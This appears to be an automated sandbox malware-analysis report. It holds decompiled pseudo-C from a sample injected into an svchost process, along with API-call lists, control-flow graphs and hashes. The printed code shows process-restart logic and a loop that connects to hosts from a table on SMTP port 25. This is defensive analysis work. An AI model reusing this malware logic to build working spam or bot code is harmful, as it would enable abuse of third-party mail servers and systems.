                                                                                                                                                                                                                                                    					 *0x4003094();
                                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                    				while(_v20 <= 0x3e8) {
                                                                                                                                                                                                                                                    					if(WaitForSingleObject( *0x4088c2c, 1) != 0) {
                                                                                                                                                                                                                                                    						_v24 = 0;
                                                                                                                                                                                                                                                    						_t40 = GetExitCodeProcess( *(_v8 + 4),  &_v24); // executed
                                                                                                                                                                                                                                                    						if(_t40 == 0) {
                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_v24 != 0x103) {
                                                                                                                                                                                                                                                    							if(_v24 != 0x17d4a580) {
                                                                                                                                                                                                                                                    								CloseHandle( *(_v8 + 4));
                                                                                                                                                                                                                                                    								 *(_v8 + 4) = 0;
                                                                                                                                                                                                                                                    								Sleep(0xbb8);
                                                                                                                                                                                                                                                    								_t44 = E040023E0( *_v8);
                                                                                                                                                                                                                                                    								_t67 = _t67 + 4;
                                                                                                                                                                                                                                                    								 *(_v8 + 4) = _t44;
                                                                                                                                                                                                                                                    								if( *(_v8 + 4) != 0) {
                                                                                                                                                                                                                                                    									_v20 = _v20 + 1;
                                                                                                                                                                                                                                                    									if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                                                                                                                                                                                                    										E04001DC0( *(_v8 + 4),  *((intOrPtr*)(_v8 + 8)));
                                                                                                                                                                                                                                                    										_t67 = _t67 + 8;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									goto L15;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							SetEvent( *0x4088c2c);
                                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					TerminateProcess( *(_v8 + 4), 0);
                                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L16;
                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                    0x0400163a
                                                                                                                                                                                                                                                    0x0400176c
                                                                                                                                                                                                                                                    0x04001771
                                                                                                                                                                                                                                                    0x04001771
                                                                                                                                                                                                                                                    0x04001642
                                                                                                                                                                                                                                                    0x04001648
                                                                                                                                                                                                                                                    0x0400164f
                                                                                                                                                                                                                                                    0x04001659
                                                                                                                                                                                                                                                    0x04001662
                                                                                                                                                                                                                                                    0x04001766
                                                                                                                                                                                                                                                    0x04001766
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001766
                                                                                                                                                                                                                                                    0x04001668
                                                                                                                                                                                                                                                    0x0400166f
                                                                                                                                                                                                                                                    0x0400168d
                                                                                                                                                                                                                                                    0x040016a3
                                                                                                                                                                                                                                                    0x040016b5
                                                                                                                                                                                                                                                    0x040016bd
                                                                                                                                                                                                                                                    0x04001761
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001761
                                                                                                                                                                                                                                                    0x040016ca
                                                                                                                                                                                                                                                    0x040016e3
                                                                                                                                                                                                                                                    0x040016fd
                                                                                                                                                                                                                                                    0x04001706
                                                                                                                                                                                                                                                    0x04001712
                                                                                                                                                                                                                                                    0x0400171e
                                                                                                                                                                                                                                                    0x04001723
                                                                                                                                                                                                                                                    0x04001729
                                                                                                                                                                                                                                                    0x04001733
                                                                                                                                                                                                                                                    0x0400173f
                                                                                                                                                                                                                                                    0x04001749
                                                                                                                                                                                                                                                    0x04001759
                                                                                                                                                                                                                                                    0x0400175e
                                                                                                                                                                                                                                                    0x0400175e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001749
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001735
                                                                                                                                                                                                                                                    0x040016ec
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040016ec
                                                                                                                                                                                                                                                    0x040016d1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040016d1
                                                                                                                                                                                                                                                    0x04001698
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001698
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 04001642
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 04001685
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 04001698
                                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE(?,00000000), ref: 040016B5
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 040016D1
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 040016EC
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 040016FD
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 04001712
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProcessSleep$CloseCodeEventExitHandleInitializeObjectSingleTerminateWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 110750051-0
                                                                                                                                                                                                                                                    • Opcode ID: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                    • Instruction ID: d411829a3222fa01dcd82fa6bcec4b197f6087181c8baad7daf63abf5d028934
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe07a60cbe0f7ecbb0d01f894f054a993e108e4a151b0fabb885b28606ec9793
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9312A74A01204DFEB14DFA4DA98B9DB7B5FB44304F54C598E809BB280D779AE80DB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 115 4001160-4001178 socket 116 4001182-40011a9 htons gethostbyname 115->116 117 400117a-400117d 115->117 119 40011ba-40011bd 116->119 120 40011ab-40011d4 116->120 118 4001259-400125c 117->118 119->118 122 40011df-40011e5 120->122 123 4001202-4001208 122->123 124 40011e7-40011f8 connect 122->124 127 4001218-400121c 123->127 128 400120a-4001216 closesocket 123->128 125 4001200 124->125 126 40011fa-40011fe 124->126 125->122 126->123 130 4001256 127->130 131 400121e-4001251 setsockopt * 2 127->131 128->118 130->118 131->130
                                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                                    			E04001160(signed int __eax, intOrPtr _a4, signed short _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                                    				signed char _v8;
                                                                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                                                                    				signed char _v13;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				short _v34;
                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                                                                    				char* _t42;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_push(6);
                                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                                    				_push(2); // executed
                                                                                                                                                                                                                                                    				L0400101E(); // executed
                                                                                                                                                                                                                                                    				_v20 = __eax;
                                                                                                                                                                                                                                                    				if(_v20 != 0xffffffff) {
                                                                                                                                                                                                                                                    					_v36 = 2;
                                                                                                                                                                                                                                                    					_push(_a8 & 0x0000ffff);
                                                                                                                                                                                                                                                    					L04001030();
                                                                                                                                                                                                                                                    					_v34 = 2;
                                                                                                                                                                                                                                                    					_push(_a4); // executed
                                                                                                                                                                                                                                                    					L04001018(); // executed
                                                                                                                                                                                                                                                    					_v12 = 2;
                                                                                                                                                                                                                                                    					if(_v12 == 0) {
                                                                                                                                                                                                                                                    						return 0xffffffffffffffff;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 0xc))))));
                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                    					_v13 = 0;
                                                                                                                                                                                                                                                    					_v40 = 0;
                                                                                                                                                                                                                                                    					while(_v40 < _a12) {
                                                                                                                                                                                                                                                    						_push(0x10);
                                                                                                                                                                                                                                                    						_t42 =  &_v36;
                                                                                                                                                                                                                                                    						_push(_t42);
                                                                                                                                                                                                                                                    						_push(_v20); // executed
                                                                                                                                                                                                                                                    						L04001036(); // executed
                                                                                                                                                                                                                                                    						if(_t42 != 0) {
                                                                                                                                                                                                                                                    							_v40 = _v40 + 1;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v13 = 1;
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if((_v13 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						if(_a16 != 0) {
                                                                                                                                                                                                                                                    							_v44 = _a16;
                                                                                                                                                                                                                                                    							_push(4);
                                                                                                                                                                                                                                                    							_push( &_v44);
                                                                                                                                                                                                                                                    							_push(0x1005);
                                                                                                                                                                                                                                                    							_push(0xffff);
                                                                                                                                                                                                                                                    							_push(_v20); // executed
                                                                                                                                                                                                                                                    							L0400102A(); // executed
                                                                                                                                                                                                                                                    							_push(4);
                                                                                                                                                                                                                                                    							_push( &_v44);
                                                                                                                                                                                                                                                    							_push(0x1006);
                                                                                                                                                                                                                                                    							_push(0xffff);
                                                                                                                                                                                                                                                    							_push(_v20); // executed
                                                                                                                                                                                                                                                    							L0400102A(); // executed
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						return _v20;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t40 = _v20;
                                                                                                                                                                                                                                                    					_push(_t40);
                                                                                                                                                                                                                                                    					L04001000();
                                                                                                                                                                                                                                                    					return _t40 | 0xffffffff;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v20;
                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                    0x04001166
                                                                                                                                                                                                                                                    0x04001168
                                                                                                                                                                                                                                                    0x0400116a
                                                                                                                                                                                                                                                    0x0400116c
                                                                                                                                                                                                                                                    0x04001171
                                                                                                                                                                                                                                                    0x04001178
                                                                                                                                                                                                                                                    0x04001187
                                                                                                                                                                                                                                                    0x0400118f
                                                                                                                                                                                                                                                    0x04001190
                                                                                                                                                                                                                                                    0x04001195
                                                                                                                                                                                                                                                    0x0400119c
                                                                                                                                                                                                                                                    0x0400119d
                                                                                                                                                                                                                                                    0x040011a2
                                                                                                                                                                                                                                                    0x040011a9
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040011ba
                                                                                                                                                                                                                                                    0x040011b5
                                                                                                                                                                                                                                                    0x040011c2
                                                                                                                                                                                                                                                    0x040011c9
                                                                                                                                                                                                                                                    0x040011cd
                                                                                                                                                                                                                                                    0x040011df
                                                                                                                                                                                                                                                    0x040011e7
                                                                                                                                                                                                                                                    0x040011e9
                                                                                                                                                                                                                                                    0x040011ec
                                                                                                                                                                                                                                                    0x040011f0
                                                                                                                                                                                                                                                    0x040011f1
                                                                                                                                                                                                                                                    0x040011f8
                                                                                                                                                                                                                                                    0x040011dc
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040011dc
                                                                                                                                                                                                                                                    0x040011fa
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040011fa
                                                                                                                                                                                                                                                    0x04001208
                                                                                                                                                                                                                                                    0x0400121c
                                                                                                                                                                                                                                                    0x04001221
                                                                                                                                                                                                                                                    0x04001224
                                                                                                                                                                                                                                                    0x04001229
                                                                                                                                                                                                                                                    0x0400122a
                                                                                                                                                                                                                                                    0x0400122f
                                                                                                                                                                                                                                                    0x04001237
                                                                                                                                                                                                                                                    0x04001238
                                                                                                                                                                                                                                                    0x0400123d
                                                                                                                                                                                                                                                    0x04001242
                                                                                                                                                                                                                                                    0x04001243
                                                                                                                                                                                                                                                    0x04001248
                                                                                                                                                                                                                                                    0x04001250
                                                                                                                                                                                                                                                    0x04001251
                                                                                                                                                                                                                                                    0x04001251
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001256
                                                                                                                                                                                                                                                    0x0400120a
                                                                                                                                                                                                                                                    0x0400120d
                                                                                                                                                                                                                                                    0x0400120e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001213
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 04001190
                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 0400119D
                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 040011F1
                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 0400120E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: closesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 530611402-0
                                                                                                                                                                                                                                                    • Opcode ID: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                    • Instruction ID: 08c5e0426ad4df4722dd3bdfc990c85badbf8b170f181f32ce41d694214c1be1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d9d7dafa64235843ffb934672811fee420f5a57adc05dc76075f4ea8ad417e8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66315070A00259EBEB14DFA4C845BEEB7B6BF48318F108649E5617F2C0E7B6A9408751
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                    			E04001490() {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                                                                    				intOrPtr _v528;
                                                                                                                                                                                                                                                    				intOrPtr _v532;
                                                                                                                                                                                                                                                    				intOrPtr _v536;
                                                                                                                                                                                                                                                    				signed int _v540;
                                                                                                                                                                                                                                                    				intOrPtr _v544;
                                                                                                                                                                                                                                                    				char _v548;
                                                                                                                                                                                                                                                    				char _v552;
                                                                                                                                                                                                                                                    				long _v556;
                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				_v12 = 3;
                                                                                                                                                                                                                                                    				_v528 = 0;
                                                                                                                                                                                                                                                    				while(_v528 < 3) {
                                                                                                                                                                                                                                                    					_v532 = 0;
                                                                                                                                                                                                                                                    					while(_v532 < 0x46) {
                                                                                                                                                                                                                                                    						E04001260(_t40,  &_v524, 0, 0x200);
                                                                                                                                                                                                                                                    						_v544 = E04001430(0x64);
                                                                                                                                                                                                                                                    						_v540 = E04001430(7);
                                                                                                                                                                                                                                                    						_t40 = E04001160(_v540,  *((intOrPtr*)(0x4088c00 + _v540 * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                    						_t73 = _t73 + 0x24;
                                                                                                                                                                                                                                                    						_v536 = _t40;
                                                                                                                                                                                                                                                    						if(_v536 == 0xffffffff) {
                                                                                                                                                                                                                                                    							Sleep(1); // executed
                                                                                                                                                                                                                                                    							_v532 = _v532 + 1;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							E040013B0( &_v524, _v544); // executed
                                                                                                                                                                                                                                                    							 *0x400304c( &_v524, 0x4003134);
                                                                                                                                                                                                                                                    							_v556 = GetTickCount();
                                                                                                                                                                                                                                                    							E040010E0(_v536,  &_v524, _v544); // executed
                                                                                                                                                                                                                                                    							_v548 = 0;
                                                                                                                                                                                                                                                    							_v552 = 0;
                                                                                                                                                                                                                                                    							E04001040(_v536,  &_v524, 0x200,  &_v548,  &_v552); // executed
                                                                                                                                                                                                                                                    							_t73 = _t73 + 0x28;
                                                                                                                                                                                                                                                    							_v8 = _v552 - _v556 + _v8;
                                                                                                                                                                                                                                                    							_push(_v536); // executed
                                                                                                                                                                                                                                                    							L04001000(); // executed
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t40 = _v528 + 1;
                                                                                                                                                                                                                                                    					_v528 = _v528 + 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                    				return _v8 / 3;
                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                    0x04001499
                                                                                                                                                                                                                                                    0x040014a0
                                                                                                                                                                                                                                                    0x040014a7
                                                                                                                                                                                                                                                    0x040014c2
                                                                                                                                                                                                                                                    0x040014cf
                                                                                                                                                                                                                                                    0x040014ea
                                                                                                                                                                                                                                                    0x04001505
                                                                                                                                                                                                                                                    0x04001517
                                                                                                                                                                                                                                                    0x04001527
                                                                                                                                                                                                                                                    0x04001544
                                                                                                                                                                                                                                                    0x04001549
                                                                                                                                                                                                                                                    0x0400154c
                                                                                                                                                                                                                                                    0x04001559
                                                                                                                                                                                                                                                    0x0400160f
                                                                                                                                                                                                                                                    0x040014e4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400155f
                                                                                                                                                                                                                                                    0x0400156d
                                                                                                                                                                                                                                                    0x04001581
                                                                                                                                                                                                                                                    0x0400158d
                                                                                                                                                                                                                                                    0x040015a8
                                                                                                                                                                                                                                                    0x040015b0
                                                                                                                                                                                                                                                    0x040015ba
                                                                                                                                                                                                                                                    0x040015e5
                                                                                                                                                                                                                                                    0x040015ea
                                                                                                                                                                                                                                                    0x040015fc
                                                                                                                                                                                                                                                    0x04001605
                                                                                                                                                                                                                                                    0x04001606
                                                                                                                                                                                                                                                    0x04001606
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001559
                                                                                                                                                                                                                                                    0x040014b9
                                                                                                                                                                                                                                                    0x040014bc
                                                                                                                                                                                                                                                    0x040014bc
                                                                                                                                                                                                                                                    0x04001622
                                                                                                                                                                                                                                                    0x0400162d

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                      • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                      • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                      • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                    • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                    • Opcode ID: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                    • Instruction ID: d79780824819048788ded504410e9a552de5875a97c05552d19a965bcf11c014
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6bc4524acd37c5f2a61d60cd04ada7e2da9e6c79a86eb7b70bf2b9ee635fd7d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 053152B5D41218EBEB20EF94DC49BD973B4AB14308F0482D9E5197A2C1E7766F848F91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                    			E040014B3() {
                                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                    					_t38 =  *((intOrPtr*)(_t70 - 0x20c)) + 1;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t70 - 0x20c)) =  *((intOrPtr*)(_t70 - 0x20c)) + 1;
                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t70 - 0x20c)) < 3) {
                                                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t70 - 0x210)) = 0;
                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                    						while( *((intOrPtr*)(_t70 - 0x210)) < 0x46) {
                                                                                                                                                                                                                                                    							E04001260(_t38, _t70 - 0x208, 0, 0x200);
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t70 - 0x21c)) = E04001430(0x64);
                                                                                                                                                                                                                                                    							 *(_t70 - 0x218) = E04001430(7);
                                                                                                                                                                                                                                                    							_t38 = E04001160( *(_t70 - 0x218),  *((intOrPtr*)(0x4088c00 +  *(_t70 - 0x218) * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                    							_t72 = _t72 + 0x24;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t70 - 0x214)) = _t38;
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t70 - 0x214)) == 0xffffffff) {
                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                    								Sleep(1); // executed
                                                                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t70 - 0x210)) =  *((intOrPtr*)(_t70 - 0x210)) + 1;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                                                    								E040013B0(_t70 - 0x208,  *((intOrPtr*)(_t70 - 0x21c))); // executed
                                                                                                                                                                                                                                                    								 *0x400304c(_t70 - 0x208, 0x4003134);
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t70 - 0x228)) = GetTickCount();
                                                                                                                                                                                                                                                    								E040010E0( *((intOrPtr*)(_t70 - 0x214)), _t70 - 0x208,  *((intOrPtr*)(_t70 - 0x21c))); // executed
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t70 - 0x220)) = 0;
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t70 - 0x224)) = 0;
                                                                                                                                                                                                                                                    								E04001040( *((intOrPtr*)(_t70 - 0x214)), _t70 - 0x208, 0x200, _t70 - 0x220, _t70 - 0x224); // executed
                                                                                                                                                                                                                                                    								 *(_t70 - 4) =  *((intOrPtr*)(_t70 - 0x224)) -  *((intOrPtr*)(_t70 - 0x228)) +  *(_t70 - 4);
                                                                                                                                                                                                                                                    								_push( *((intOrPtr*)(_t70 - 0x214))); // executed
                                                                                                                                                                                                                                                    								L04001000(); // executed
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                    					return  *(_t70 - 4) / 3;
                                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                    0x040014b3
                                                                                                                                                                                                                                                    0x040014b3
                                                                                                                                                                                                                                                    0x040014b3
                                                                                                                                                                                                                                                    0x040014b9
                                                                                                                                                                                                                                                    0x040014bc
                                                                                                                                                                                                                                                    0x040014c2
                                                                                                                                                                                                                                                    0x040014c9
                                                                                                                                                                                                                                                    0x040014cf
                                                                                                                                                                                                                                                    0x040014cf
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040014ea
                                                                                                                                                                                                                                                    0x04001505
                                                                                                                                                                                                                                                    0x04001517
                                                                                                                                                                                                                                                    0x04001527
                                                                                                                                                                                                                                                    0x04001544
                                                                                                                                                                                                                                                    0x04001549
                                                                                                                                                                                                                                                    0x0400154c
                                                                                                                                                                                                                                                    0x04001559
                                                                                                                                                                                                                                                    0x0400160d
                                                                                                                                                                                                                                                    0x0400160f
                                                                                                                                                                                                                                                    0x040014db
                                                                                                                                                                                                                                                    0x040014e4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400155f
                                                                                                                                                                                                                                                    0x0400155f
                                                                                                                                                                                                                                                    0x0400156d
                                                                                                                                                                                                                                                    0x04001581
                                                                                                                                                                                                                                                    0x0400158d
                                                                                                                                                                                                                                                    0x040015a8
                                                                                                                                                                                                                                                    0x040015b0
                                                                                                                                                                                                                                                    0x040015ba
                                                                                                                                                                                                                                                    0x040015e5
                                                                                                                                                                                                                                                    0x040015fc
                                                                                                                                                                                                                                                    0x04001605
                                                                                                                                                                                                                                                    0x04001606
                                                                                                                                                                                                                                                    0x04001606
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001559
                                                                                                                                                                                                                                                    0x0400161a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400161a
                                                                                                                                                                                                                                                    0x0400161f
                                                                                                                                                                                                                                                    0x04001622
                                                                                                                                                                                                                                                    0x0400162d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400162d

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                      • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                      • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                      • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
